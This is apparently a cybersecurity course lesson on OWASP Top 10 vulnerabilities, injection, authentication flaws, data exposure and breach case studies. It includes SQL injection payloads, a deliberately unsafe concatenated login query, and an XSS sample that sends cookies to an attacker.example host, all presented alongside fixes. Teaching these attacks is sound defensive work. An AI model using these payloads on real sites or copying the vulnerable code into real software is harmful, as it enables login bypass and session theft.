5.1 Application & Data Vulnerabilities
Application & Data Vulnerabilities: The Attack Surface Applications Expose
Applications are where attackers meet your data. Master the OWASP Top 10 framework, trace how injection and broken authentication actually work, and connect every vulnerability to the real breaches that made headlines. This is the foundation for everything that comes next in Unit 5.
- 5.1.1 — Learning Objectives (3 min)
- 5.1.2 — Why Applications Are the #1 Attack Vector (7 min)
- 5.1.3 — Essential Vocabulary & Exam Tips (10 min)
- 5.1.4 — The OWASP Top 10 Framework (12 min)
- 5.1.5 — Injection Attacks: How SQLi & XSS Actually Work (12 min)
- 5.1.6 — Broken Authentication & Session Failures (8 min)
- 5.1.7 — Sensitive Data Exposure: Storage & Transit (6 min)
- 5.1.8 — Real Breach Case Studies (6 min)
- 5.1.9 — Worked Examples: Predict First (7 min)
- 5.1.10 — AP Exam Strategy (4 min)
- 5.1.11 — FAQ (5 min)
5.1.1 — Learning Objectives
By the end of this lesson you will be able to:
- Identify the three categories of application and data vulnerabilities: injection, authentication & access, and data exposure.
- Map any described attack to its OWASP Top 10 category.
- Trace how SQL injection, XSS, and broken authentication actually execute, step by step.
- Distinguish application vulnerabilities from data vulnerabilities and explain how they chain together in real breaches.
- Recommend the correct control for each category of vulnerability.
- Analyze real-world breach scenarios (Equifax, Target, Capital One) and identify which OWASP category was exploited.
5.1.2 — Why Applications Are the #1 Attack Vector
Units 1 through 4 of this course built a mental model: attackers target people (Unit 1), physical spaces (Unit 2), networks (Unit 3), and devices (Unit 4). Unit 5 goes to the final frontier — the applications and data those earlier controls protect.
Here is the uncomfortable reality that drives this entire unit: even if a company deploys every control from Units 1–4 perfectly — the best MFA, the best firewalls, the best hardened servers — a single vulnerable web application can hand an attacker everything. Applications are exposed to the Internet by design. They must accept untrusted input. They hold the data attackers actually want.
Why Applications Expose So Much Attack Surface
A web form cannot function without letting strangers type data into it. Every input field, URL parameter, and API endpoint is a potential doorway. Firewalls cannot block this traffic because it is the product.
Your bank's login page is the translator between "I am a customer" and "show me this account's balance." If the translator is tricked, the database hands over data that the database itself would have refused to give directly.
Security reviews slow releases. Developers copy code from Stack Overflow. Frameworks get patched but applications do not. This is not cynicism: in the data behind the OWASP Top 10 (2021), 94% of applications were tested for some form of broken access control, and that category ranked first on the list.
A phished employee loses one account. A vulnerable application leaks every record in the database. Scale makes application vulnerabilities the highest-payoff target.
The Three Categories You Must Know Cold
Every application and data vulnerability on the AP Cyber exam falls into one of three buckets. Memorize these three — they are the lens through which you will classify every scenario in the unit.
| Category | What It Means | Classic Example | Defender Says |
|---|---|---|---|
| Injection | Untrusted input reaches an interpreter (SQL, HTML, shell) as code. | SQL injection, XSS, command injection | "Never trust user input. Parameterize everything." |
| Broken Auth & Access Control | Identity verification or authorization fails; attackers impersonate or escalate. | Session hijacking, weak passwords, missing authz checks | "Verify who you are. Check what you can do. Every request." |
| Sensitive Data Exposure | Confidential data is stored, transmitted, or logged without adequate protection. | Plaintext passwords, unencrypted backups, HTTP instead of HTTPS | "Encrypt at rest. Encrypt in transit. Log nothing sensitive." |
5.1.3 — Essential Vocabulary & Exam Tips
The exam rewards students who can translate a plain-English attack description into the exact technical term. Learn these definitions as matched pairs — what the term means and what the exam calls it.
/user/123 to /user/124 and seeing another person's data.
5.1.4 — The OWASP Top 10 Framework
The Open Web Application Security Project maintains the industry's canonical list of the most critical web application security risks. The AP Cyber exam uses this framework implicitly — every Unit 5 application-security question maps to an OWASP category.
You do not need to memorize OWASP numbering (A01, A02, etc.) for the AP exam. You do need to recognize each category by its description and map real scenarios to the right one.
The OWASP Top 10 (2021 edition) — AP Cyber Exam Priority
| OWASP Category | What Goes Wrong | Example | Primary Control |
|---|---|---|---|
| Broken Access Control | Users can perform actions outside their intended permissions. | User changes URL from /orders/42 to /orders/43 and sees another customer's order. | Enforce authorization on every request. Deny by default. |
| Cryptographic Failures (a.k.a. Sensitive Data Exposure) | Data is stored or transmitted without adequate protection. | Passwords stored in plaintext. HTTP login page. Old MD5 hashes. | Encrypt in transit (TLS). Hash passwords (bcrypt/Argon2). Encrypt at rest. |
| Injection | Untrusted input is interpreted as code. | SQL injection, XSS, command injection. | Parameterized queries. Output encoding. Input validation. |
| Insecure Design | Security was not considered during application design. | Password reset flow has no rate limit, allowing enumeration. | Threat modeling during design. Secure design patterns. |
| Security Misconfiguration | Default credentials, unnecessary features enabled, verbose errors. | Admin panel accessible on public IP with password admin/admin. | Hardening baselines. Disable defaults. Minimal attack surface. |
| Vulnerable & Outdated Components | Using libraries or frameworks with known unpatched flaws. | Apache Struts with known CVE still running in production. | Patch management. Dependency scanning. SBOM. |
| Identification & Authentication Failures (a.k.a. Broken Authentication) | Identity verification fails. | Weak password policies. Credential stuffing works. No MFA. | MFA. Rate limiting. Strong session management. |
| Software & Data Integrity Failures | Code or data is accepted from untrusted sources without verification. | Auto-update mechanism does not verify signatures. | Code signing. Integrity checks. Trusted supply chain. |
| Security Logging & Monitoring Failures | Attacks are not logged or alerts are not generated. | Breach went undetected for 9 months because no logs existed. | Centralized logging. Alerting thresholds. SIEM review. |
| Server-Side Request Forgery (SSRF) | Application fetches a URL from user input, enabling internal network access. | User supplies http://169.254.169.254/ and app leaks AWS metadata. | Validate URL targets. Block private IP ranges from app requests. |
Rows in purple are the four categories that appear most often on AP Cyber exam questions. If you are tight on study time, prioritize these.
5.1.5 — Injection Attacks: How SQLi & XSS Actually Work
Injection is the single most tested application vulnerability on AP Cyber. The exam does not expect you to write injection payloads, but it absolutely expects you to trace why a given payload works.
The Universal Pattern of Injection
Every injection attack in history follows the same three-step pattern:
- The application receives untrusted input (form field, URL parameter, header, uploaded file).
- The application combines that input with code meant to be interpreted later (SQL query, HTML page, shell command).
- The interpreter cannot tell the difference between the developer's code and the attacker's input. The interpreter runs everything as instructions.
If you can recite this three-step pattern on the exam, you can solve any injection question.
SQL Injection: A Real Login Form
Suppose a developer writes this login code (conceptual Python):
query = "SELECT * FROM users WHERE username = '" + input_user + "' AND password = '" + input_pass + "'"
database.execute(query)
When the user types alice and hunter2, the query becomes:
SELECT * FROM users WHERE username = 'alice' AND password = 'hunter2'
Exactly what the developer intended. Now watch what happens when an attacker types ' OR '1'='1 in the password field:
SELECT * FROM users WHERE username = 'alice' AND password = '' OR '1'='1'
SQL evaluates AND before OR, so the database reads this as: (username is alice AND password is empty) OR ('1' equals '1'). The second condition is true for every row, so the query returns every row. The attacker is logged in as the first user in the database, which is often the admin.
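To watch the bypass run end to end, here is a minimal sketch using Python's built-in sqlite3 module and an in-memory database. The table contents and the function name vulnerable_login are assumptions made for this illustration, and passwords are stored in plaintext only to mirror the example above. The query is built by concatenation on purpose, so treat this as a demonstration of the flaw, not as code to reuse.

```python
import sqlite3

# Illustrative in-memory database; the table and rows are made up for this demo.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("admin", "s3cret"), ("alice", "hunter2")],
)


def vulnerable_login(input_user, input_pass):
    # DELIBERATELY UNSAFE: user input is pasted straight into the SQL text.
    query = (
        "SELECT * FROM users WHERE username = '" + input_user
        + "' AND password = '" + input_pass + "'"
    )
    return conn.execute(query).fetchall()


normal_rows = vulnerable_login("alice", "hunter2")      # one matching row
attack_rows = vulnerable_login("alice", "' OR '1'='1")  # every row in the table
```

The attacker never supplied a valid password, yet the second call returns both the admin row and the alice row.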
The Fix: Parameterized Queries
The defense is not to filter special characters — that is a losing game. The defense is to structurally separate code from data. A parameterized query looks like this:
query = "SELECT * FROM users WHERE username = ? AND password = ?"
database.execute(query, [input_user, input_pass])
The ? placeholders tell the database driver: these are data, not code. No matter what is in them, do not interpret them as SQL. An attacker typing ' OR '1'='1 now just searches for a literal password that contains those characters, finds nothing, and is rejected.
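The same idea can be tried with Python's built-in sqlite3 module, which uses ? placeholders. This is a sketch under assumptions: the table, the sample row, and the name safe_login are invented for illustration, and a real system would compare password hashes rather than plaintext values.

```python
import sqlite3

# Illustrative in-memory database; the table and row are made up for this demo.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", "hunter2"))


def safe_login(input_user, input_pass):
    # The SQL text is fixed; user input travels separately as bound parameters.
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (input_user, input_pass)).fetchall()


good = safe_login("alice", "hunter2")        # matches the stored row
attack = safe_login("alice", "' OR '1'='1")  # treated as a literal string, no match
```

Because the payload is only ever compared as data, the second call returns an empty list.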
Cross-Site Scripting (XSS): Injection into HTML
XSS is the same three-step pattern, but the interpreter is the browser and the injected code is JavaScript.
Suppose a comment section displays user comments like this:
[user comment here]
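If the application does not encode output, an attacker can submit a "comment" that contains JavaScript (for example, inside a script tag) which reads the visitor's session cookie and sends it to a server the attacker controls. The browser cannot tell that markup apart from the page's own code, so it runs it.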
Every future visitor who views that comment has their session cookie sent to the attacker. The attacker now impersonates those users without knowing their passwords.
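The standard defense is output encoding: convert the characters that HTML treats as markup into harmless entities before the comment is placed in the page. Below is a minimal sketch using html.escape from Python's standard library. The function name render_comment, the div wrapper, and the sample payload (including the attacker.example domain) are assumptions for illustration, not the page's original markup.

```python
import html


def render_comment(comment: str) -> str:
    # html.escape replaces &, <, >, and quote characters with HTML entities,
    # so the browser displays the comment as text instead of parsing it as markup.
    return '<div class="comment">' + html.escape(comment) + "</div>"


# Hypothetical cookie-stealing payload, used only to show the encoding step.
payload = (
    '<script>new Image().src="https://attacker.example/?c="'
    "+document.cookie</script>"
)
rendered = render_comment(payload)
```

After encoding, the rendered string contains &lt;script&gt; rather than a live script tag, so visitors see the attacker's text on screen and nothing executes.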
Injection Variants You Should Recognize
| Variant | Interpreter | Typical Target |
|---|---|---|
| SQL Injection | Database engine | Bypass login, dump tables, modify data |
| XSS (Cross-Site Scripting) | Victim's browser | Steal sessions, deface, keylog |
| Command Injection | Server OS shell | Execute commands on server |
| LDAP Injection | Directory service | Bypass directory authentication |
| XML/XXE Injection | XML parser | Read local files, SSRF |
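Command injection follows the same logic as SQL injection, and so does its fix: keep the command and the data structurally separate. The sketch below passes user input as a single entry in an argument list instead of building a shell string. The function name show_argument and the hostile sample value are assumptions for illustration; the child process is just the Python interpreter echoing its argument.

```python
import subprocess
import sys


def show_argument(user_supplied: str) -> str:
    # An argument list with no shell involved: the input arrives in the child
    # process as one argv entry, so ';' and other shell syntax have no meaning.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_supplied],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


hostile = "report.txt; echo INJECTED"
printed = show_argument(hostile)  # comes back unchanged, as plain data
```

Had the same input been concatenated into a string and run with shell=True, the shell would have treated everything after the semicolon as a second command.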
5.1.6 — Broken Authentication & Session Failures
Authentication is the system that answers the question: are you actually who you say you are? Broken authentication is any failure of that system. On the AP exam, broken authentication usually shows up as one of four patterns.
Pattern 1: Weak Password Policies
The application allows short passwords, common passwords, or reused breached passwords. Attackers use credential stuffing (trying leaked username/password pairs from other breaches) or dictionary attacks (trying common passwords).
The defense isn't "require special characters." Modern guidance (NIST SP 800-63B) says password length is what matters, combined with checking against known-breached passwords. Special character requirements actually push users toward predictable patterns like Password1!.
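A length-plus-breach-list policy can be sketched in a few lines. Everything named here is an assumption for illustration: the 12-character minimum is an arbitrary threshold chosen for the demo, and BREACHED_PASSWORDS is a tiny stand-in for a real breached-password corpus.

```python
MIN_LENGTH = 12  # assumed threshold for this sketch, not a quoted requirement

# Hypothetical stand-in for a large list of passwords seen in past breaches.
BREACHED_PASSWORDS = {"password1!", "123456789012", "qwertyuiop12"}


def password_problems(candidate: str) -> list[str]:
    """Return the reasons a candidate password should be rejected."""
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append("too short")
    if candidate.lower() in BREACHED_PASSWORDS:
        problems.append("appears in breached-password list")
    return problems


weak = password_problems("Password1!")
strong = password_problems("correct horse battery staple")
```

Note that the policy has no special-character rule at all: "Password1!" satisfies a typical complexity rule but fails both checks here, while a long passphrase passes.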
Pattern 2: Session Token Problems
When you log in, the server gives your browser a session token (a random string stored as a cookie). Every subsequent request sends that token as proof of identity. If the token is stolen, guessed, or reused, an attacker is logged in as you — no password needed.
Old systems generated session IDs sequentially (session 1001, 1002, 1003...). Attackers guessed valid IDs. Modern systems use cryptographically random tokens.
If a session token is passed in the URL (?sessionid=abc123), it ends up in browser history, server logs, and referrer headers sent to other sites. Tokens belong in cookies, never URLs.
A session valid for a year means a stolen token is valid for a year. Good systems expire tokens after inactivity and require periodic re-authentication for sensitive actions.
If a token remains valid when used from a different IP, device, or browser, a stolen token is infinitely reusable. Binding tokens to device fingerprints limits damage.
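Two of these fixes, unguessable tokens and idle expiry, can be sketched with Python's secrets module. The in-memory sessions dictionary, the 15-minute timeout, and the function names are assumptions for illustration; a real application would use its framework's session store.

```python
import secrets
import time
from typing import Optional

IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed idle limit for this sketch

# Hypothetical in-memory store: token -> {"user": ..., "last_seen": ...}
sessions = {}


def create_session(user: str, now: Optional[float] = None) -> str:
    # 32 bytes from the OS random source: infeasible to guess or enumerate,
    # unlike sequential IDs such as 1001, 1002, 1003.
    token = secrets.token_urlsafe(32)
    sessions[token] = {
        "user": user,
        "last_seen": time.time() if now is None else now,
    }
    return token


def user_for_token(token: str, now: Optional[float] = None) -> Optional[str]:
    now = time.time() if now is None else now
    session = sessions.get(token)
    if session is None:
        return None
    if now - session["last_seen"] > IDLE_TIMEOUT_SECONDS:
        del sessions[token]  # expired: a stolen copy stops working too
        return None
    session["last_seen"] = now
    return session["user"]
```

The token would be delivered to the browser in a cookie, never in a URL, for the reasons given above.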
Pattern 3: Missing or Weak MFA
Multi-factor authentication (MFA) requires something the user knows (password) plus something they have (phone, token, security key) or something they are (fingerprint). Skipping MFA on the grounds that "it is inconvenient" is the single most common broken-authentication failure in breach post-mortems.
Not all MFA is equal. SMS codes can be intercepted by SIM-swap attacks. Authenticator apps (TOTP) are better. Hardware security keys (FIDO2) are strongest.
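For readers curious about what an authenticator app actually computes, here is a compact sketch of the HOTP and TOTP calculations from RFC 4226 and RFC 6238, using only the standard library. The function names are chosen for this example. The key point is that the code is derived from a shared secret plus the current time, so nothing travels over SMS for a SIM-swapper to intercept.

```python
import hashlib
import hmac
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    # HMAC-SHA1 over the 8-byte big-endian counter (RFC 4226).
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation: the low 4 bits of the last byte choose an offset.
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: float, step: int = 30, digits: int = 6) -> str:
    # TOTP is HOTP with the counter set to the number of elapsed time steps.
    return hotp(secret, int(unix_time) // step, digits)


# Test secret taken from the RFC appendices (ASCII "12345678901234567890").
rfc_secret = b"12345678901234567890"
code_at_59s = totp(rfc_secret, 59, digits=8)
```

Both the server and the app run the same calculation, and the server accepts the login only if the two codes match for the current time window.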
Pattern 4: Credential Recovery Flows
Password reset flows are frequently weaker than the login flow itself. If "forgot password" sends a link valid for 7 days, stored in an unencrypted email, and allows the attacker to set any new password without confirming identity, the password itself never mattered.
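A sturdier reset flow issues a random token that expires quickly and works exactly once. The sketch below shows one way to do that; the 15-minute lifetime, the in-memory pending_resets dictionary, and the function names are assumptions for illustration. Only a hash of the token is stored, so a leaked table does not hand out working reset links.

```python
import hashlib
import secrets
import time

RESET_TTL_SECONDS = 15 * 60  # assumed lifetime; far shorter than 7 days

# Hypothetical store: sha256(token) -> (username, expires_at)
pending_resets = {}


def issue_reset_token(username, now=None):
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    key = hashlib.sha256(token.encode()).hexdigest()
    pending_resets[key] = (username, now + RESET_TTL_SECONDS)
    return token  # this value goes in the emailed link


def redeem_reset_token(token, now=None):
    now = time.time() if now is None else now
    key = hashlib.sha256(token.encode()).hexdigest()
    entry = pending_resets.pop(key, None)  # pop makes the token single-use
    if entry is None:
        return None
    username, expires_at = entry
    return username if now <= expires_at else None
```

A complete flow would still confirm identity by other means before accepting the new password; this sketch only covers token lifetime and reuse.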
5.1.7 — Sensitive Data Exposure: Storage & Transit
Sensitive data exposure (OWASP now calls it "Cryptographic Failures") covers every way that confidential data can be revealed because it was not protected adequately. Two contexts matter: data at rest (storage) and data in transit (network).
Data At Rest: What Went Wrong
| Failure | Why It Fails | Control |
|---|---|---|
| Plaintext passwords in database | A single database breach exposes every credential immediately. Attackers try those credentials on every other site (credential stuffing). | Hash passwords with a slow adaptive function (bcrypt, Argon2). Never encrypt passwords — hash them. |
| Weak or deprecated hash algorithms | MD5 and SHA-1 are broken. Attackers precompute rainbow tables or use GPU clusters to crack billions of hashes per second. | Use bcrypt, scrypt, or Argon2 with per-user salt. (Covered deeply in 5.3.) |
| Unencrypted backups | Backups often leave the production security perimeter. An unencrypted backup tape lost in shipping is a data breach. | Encrypt backups before they leave disk. Manage backup keys separately from production keys. |
| Sensitive data in application logs | Debug logs capturing full request bodies routinely contain passwords, credit cards, and session tokens. Logs get shared, shipped to third parties, and kept forever. | Scrub sensitive fields from logs at the logging library level. Never log password, CVV, or token fields. |
| Data retained past its useful life | Data you do not have cannot be stolen. Storing 10 years of customer records because "we might need it" enlarges every breach. | Data retention policy with automatic deletion. Minimize collection. |
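The password-storage rows of the table can be sketched with scrypt, which ships in Python's hashlib (bcrypt and Argon2 need third-party packages). The cost parameters and function names below are assumptions for illustration, not a tuned recommendation.

```python
import hashlib
import hmac
import os

# Assumed cost settings for this sketch; real deployments tune these.
SCRYPT_PARAMS = {"n": 2 ** 14, "r": 8, "p": 1}


def hash_password(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)  # fresh random salt for every user
    digest = hashlib.scrypt(
        password.encode("utf-8"), salt=salt, dklen=32, **SCRYPT_PARAMS
    )
    return salt, digest  # store both; neither reveals the password


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    candidate = hashlib.scrypt(
        password.encode("utf-8"), salt=salt, dklen=32, **SCRYPT_PARAMS
    )
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(candidate, expected)


salt, stored = hash_password("hunter2")
```

Because each user gets a different salt, two users with the same password end up with different stored hashes, which defeats precomputed rainbow tables.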
Data In Transit: What Went Wrong
Data moving between client and server is exposed to every network between them. If the data is not encrypted in transit, anyone on those networks can read and modify it.
- HTTP instead of HTTPS. Anyone on public Wi-Fi, in an ISP, or on the corporate network can read unencrypted HTTP traffic. There is no modern justification for HTTP on an authenticated application.
- Outdated TLS versions. TLS 1.0 and 1.1 have known vulnerabilities. Current baseline is TLS 1.2; TLS 1.3 is preferred. Deprecated protocols must be disabled on the server.
- Weak cipher suites. Even with TLS enabled, servers can be configured to accept weak ciphers (RC4, DES). Attackers can force a downgrade negotiation.
- Missing certificate validation. If the client does not verify the server's certificate, a man-in-the-middle can present their own certificate and decrypt traffic.
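On the client side, several of these failures come down to a few configuration lines. Here is a minimal sketch using Python's ssl module; the function name make_client_context is an assumption, and a server would need equivalent settings in its own configuration.

```python
import ssl


def make_client_context() -> ssl.SSLContext:
    # create_default_context() turns on certificate verification and
    # hostname checking, which is what blocks a man-in-the-middle certificate.
    ctx = ssl.create_default_context()
    # Refuse TLS 1.0 and 1.1 outright instead of negotiating down to them.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


ctx = make_client_context()
```

The dangerous pattern to recognize is code that sets verify_mode to ssl.CERT_NONE or disables check_hostname to silence certificate errors, which is the "missing certificate validation" failure from the list above.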
5.1.8 — Real Breach Case Studies
Every category you just studied shows up in real breaches that made headlines. Walking through each of these helps lock in which OWASP category the AP exam is testing when similar scenarios appear.
Case 1: Equifax (2017) — 147 Million Records
What happened: Attackers exploited a known vulnerability in Apache Struts, a web application framework used on Equifax's consumer dispute portal. A patch had been available for two months but had not been applied.
OWASP category: Vulnerable and Outdated Components (with Injection as the underlying flaw in Struts itself).
What was exposed: Names, Social Security numbers, birth dates, addresses, driver's license numbers for roughly half the U.S. adult population.
Lesson: Patch management is a security control. An unpatched library in production is a vulnerability regardless of how secure the rest of the application is.
Case 2: Heartland Payment Systems (2008) — 134 Million Card Numbers
What happened: SQL injection on a corporate website gave attackers initial access. They pivoted to the payment processing network and installed sniffers that captured unencrypted card data as it moved between systems.
OWASP categories: Injection (initial access) + Cryptographic Failures (unencrypted internal traffic).
What was exposed: Credit and debit card numbers from every transaction for months.
Lesson: Internal networks are not "trusted." Data should be encrypted in transit even inside a company's own network (defense in depth).
Case 3: Target (2013) — 40 Million Card Numbers
What happened: Attackers phished an HVAC contractor that had remote access to Target's network. Once inside, they installed memory-scraping malware on point-of-sale systems that captured card data from RAM as customers swiped.
OWASP categories: Broken Access Control (HVAC vendor had access to payment systems with no segmentation) + Sensitive Data Exposure (card data was readable in memory).
What was exposed: Card data for 40 million customers, personal data for another 70 million.
Lesson: The weakest third-party access point becomes your weakest point. Network segmentation and least-privilege access for vendors are non-negotiable.
Case 4: Capital One (2019) — 100 Million Records
What happened: A former AWS employee exploited a misconfigured web application firewall to trick Capital One's servers into making requests to AWS metadata services (SSRF). The metadata contained credentials that gave access to S3 buckets full of customer data.
OWASP categories: Security Misconfiguration + Server-Side Request Forgery.
What was exposed: Names, addresses, and credit scores for roughly 100 million people, plus Social Security numbers and bank account numbers for a much smaller subset of them.
Lesson: Cloud misconfigurations are the modern equivalent of leaving the front door unlocked. Cloud metadata services and WAF rules require specific hardening.
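One application-level control against SSRF is to check where a user-supplied URL points before the server fetches it. The sketch below uses Python's ipaddress module; the function name is_safe_fetch_target is an assumption, and this is a simplified illustration rather than a description of Capital One's actual remediation.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_safe_fetch_target(url: str) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parts.hostname, None)
    except socket.gaierror:
        return False  # unresolvable host: refuse rather than guess
    for info in infos:
        # Drop any IPv6 zone suffix (e.g. %eth0) before parsing the address.
        ip = ipaddress.ip_address(info[4][0].split("%")[0])
        if (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False  # internal or special-purpose address
    return True


metadata_ok = is_safe_fetch_target("http://169.254.169.254/latest/meta-data/")
```

The cloud metadata address 169.254.169.254 is link-local, so it is rejected. A production check would also have to make sure the address it validated is the address the request actually connects to, since a hostname can resolve differently a moment later.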
Case 5: Yahoo (2013–2014, disclosed 2016) — 3 Billion Accounts
What happened: Multiple intrusions over two years. Attackers obtained Yahoo's user database, which stored passwords hashed with MD5 — a deprecated algorithm — with minimal salting. Attackers cracked most passwords offline at GPU speed.
OWASP category: Cryptographic Failures (deprecated hash function).
What was exposed: Email addresses, security questions, hashed passwords for every Yahoo account at the time.
Lesson: Choosing the right password hashing algorithm is not an implementation detail. Yahoo's choice of MD5 effectively made their password storage transparent once breached.
5.1.9 — Worked Examples: Predict First, Then Classify
The exam rewards students who classify before they read options. For each of these worked examples, cover the answer, commit to your category, then compare.
/records/5821. A security researcher notices that changing the number in the URL to /records/5822 returns a different patient's complete history. Authentication is required, but any logged-in user can access any record.
Classify Before Looking at Options
The user is authenticated — they logged in successfully. The failure is that the system does not check whether this logged-in user is allowed to see this particular record. Classification: Broken Access Control.
Eliminate Trap Answers
Broken authentication would mean they got in without valid credentials — not the case here. Injection would require malformed input to the application — the attacker just incremented a number. Sensitive data exposure describes the consequence, but the root cause is missing authorization checks.
Identify the Fix
The application must verify on every request: does this authenticated user have permission to view record 5822? In code: check that record.patient_id == authenticated_user.patient_id (or their delegated viewers) before returning the record.
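That per-request check can be sketched as follows. The User and Record classes, the sample records, the patient IDs, and the Forbidden exception are all assumptions invented for this illustration.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    patient_id: int


@dataclass
class Record:
    patient_id: int
    history: str
    delegated_viewers: set = field(default_factory=set)


class Forbidden(Exception):
    """Raised when an authenticated user may not view a record."""


# Hypothetical records keyed by the number that appears in the URL.
RECORDS = {
    5821: Record(patient_id=17, history="record for patient 17"),
    5822: Record(patient_id=18, history="record for patient 18"),
}


def get_record(authenticated_user: User, record_id: int) -> Record:
    record = RECORDS.get(record_id)
    # Deny by default: a missing record and a forbidden one look identical.
    if record is None:
        raise Forbidden()
    allowed = (
        record.patient_id == authenticated_user.patient_id
        or authenticated_user.patient_id in record.delegated_viewers
    )
    if not allowed:
        raise Forbidden()
    return record


own_record = get_record(User(patient_id=17), 5821)
```

With this check in place, the same user changing the URL to /records/5822 gets a Forbidden error instead of another patient's history.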
admin' -- in the username field of a login form and leaves the password field blank. They are immediately logged in as the administrator. The application uses a MySQL database.
Trace the Attack
The single quote after "admin" closes the string in the SQL query. The -- is a SQL comment marker, and everything after it is ignored. (MySQL only treats -- as a comment when it is followed by a space or other whitespace, so the payload ends with a space.) The query becomes: SELECT * FROM users WHERE username = 'admin' -- ' AND password = ''. The password check is commented out. The database returns the admin row, and the attacker is authenticated.
Classify
Untrusted input (username field) was interpreted as code (SQL). Classification: Injection (specifically SQL injection).
Identify the Control
Parameterized queries. The username field should be bound as a data parameter, not concatenated into the query string. No amount of input filtering is as reliable as structural separation.
What Category?
No one was hacked. No login was bypassed. The failure is that sensitive data is being written to a place where it should not exist and is accessible to people who should not see it. Classification: Sensitive Data Exposure (Cryptographic Failures).
Why Is This Serious Even Without an Active Attack?
Every log entry is a potential breach. Third-party employees with access, backups of the logging service, a future misconfiguration of the log retention policy, or a breach of the logging vendor all expose the data. Sensitive data exposure failures are breach accelerants — they make future attacks more damaging.
The Fix
Scrub password, CVV, and token fields from logs at the logging library level, before the log line is ever written. Also review what data is being collected in the first place (data minimization).
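Scrubbing at the logging-library level can be sketched with a filter from Python's logging module. The class name RedactSensitive, the field list, and the assumption that sensitive values appear as key=value pairs are all illustrative; structured logs would need field-aware redaction instead of a regular expression.

```python
import logging
import re

# Assumes sensitive values appear as key=value pairs in the log message.
SENSITIVE = re.compile(r"(?i)\b(password|cvv|token)=([^\s&]+)")


class RedactSensitive(logging.Filter):
    def filter(self, record: logging.LogRecord) -> bool:
        # Build the final message, redact it, and store it back on the record
        # so every handler downstream sees only the scrubbed text.
        message = record.getMessage()
        record.msg = SENSITIVE.sub(r"\1=[REDACTED]", message)
        record.args = ()
        return True  # keep the record, just with secrets removed


logger = logging.getLogger("app")
logger.addFilter(RedactSensitive())
```

Because the filter runs before any handler writes the line, the raw value never reaches a file, a log shipper, or a third-party logging service.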
5.1.10 — AP Exam Strategy: Application & Data Security Questions
Unit 5 questions on the AP Cyber exam tend to follow predictable patterns. If you recognize the pattern, you can solve the question before reading all four options — which is exactly the "predict first" method that separates 5-scorers from 3-scorers.
The Three-Question Triage
For any application-security scenario on the exam, run through these three questions in order:
- Was untrusted input interpreted as code? If yes → Injection.
- Did the attacker get in without valid credentials, or act as someone they are not? If they got in with no password → Broken Authentication. If they got in as themselves but did things they shouldn't → Broken Access Control.
- Was data revealed because of how it was stored, transmitted, or logged? If yes → Sensitive Data Exposure / Cryptographic Failures.
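If it helps to see the triage as an ordered decision procedure, the three questions can be written as a small function. This is purely a study aid; the function name and the parameter names are invented for this sketch.

```python
def triage(
    input_ran_as_code: bool,
    got_in_without_valid_credentials: bool,
    exceeded_own_permissions: bool,
    data_revealed_by_handling: bool,
) -> str:
    # Question 1: was untrusted input interpreted as code?
    if input_ran_as_code:
        return "Injection"
    # Question 2: identity failure versus permission failure.
    if got_in_without_valid_credentials:
        return "Broken Authentication"
    if exceeded_own_permissions:
        return "Broken Access Control"
    # Question 3: was data exposed by how it was stored, sent, or logged?
    if data_revealed_by_handling:
        return "Sensitive Data Exposure / Cryptographic Failures"
    return "Unclassified: reread the scenario"


# A logged-in user edits the URL and sees someone else's order.
url_tampering = triage(False, False, True, False)
```

The order matters: the questions are checked top to bottom, and the first "yes" decides the category.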
Pattern-Match Language the Exam Uses
| Exam Phrase | Probable Category |
|---|---|
| "submitted a specially crafted input," "included special characters" | Injection |
| "a form field," "a URL parameter," "JavaScript executed in the browser" | Injection (XSS if browser, SQLi if database) |
| "used a stolen session cookie," "hijacked the session" | Broken Authentication / Session Hijacking |
| "modified the URL to access another user's data" | Broken Access Control |
| "the database was leaked and passwords were recovered" | Sensitive Data Exposure (weak hashing) |
| "intercepted over the network," "captured on public Wi-Fi" | Sensitive Data Exposure (no TLS / weak TLS) |
| "a known vulnerability that had a patch available" | Vulnerable & Outdated Components |
Common Distractor Traps
If the attack did not require the password (session hijacking, SQLi login bypass), changing the password does nothing. Don't fall for "require users to reset passwords" when the root cause was elsewhere.
Firewalls are Unit 3 controls. Application-layer attacks pass through the firewall as legitimate HTTP/HTTPS traffic. A firewall cannot stop SQL injection or XSS.
Antivirus finds known malware on endpoints. It cannot stop attacks against your web application's login form. Wrong layer.
Trying to filter out dangerous characters is a losing game. Parameterized queries (for SQLi) and output encoding (for XSS) are structural, not filter-based. Pick the structural option when it appears.
5.1.11 — Frequently Asked Questions
Q: What is the difference between an application vulnerability and a data vulnerability?
Application vulnerabilities live in the code or configuration of software (SQL injection, XSS, broken auth). Data vulnerabilities live in how data is handled (plaintext storage, unencrypted transit, over-collection). Most real breaches use an application vulnerability to reach a data vulnerability.
Q: Do I need to memorize the exact OWASP Top 10 numbering (A01, A02, etc.) for the exam?
No. The AP Cyber exam tests the concepts in the OWASP Top 10, not the numbering. You need to recognize each category by its description and match scenarios to the right one.
Q: Why is "broken authentication" different from "broken access control"?
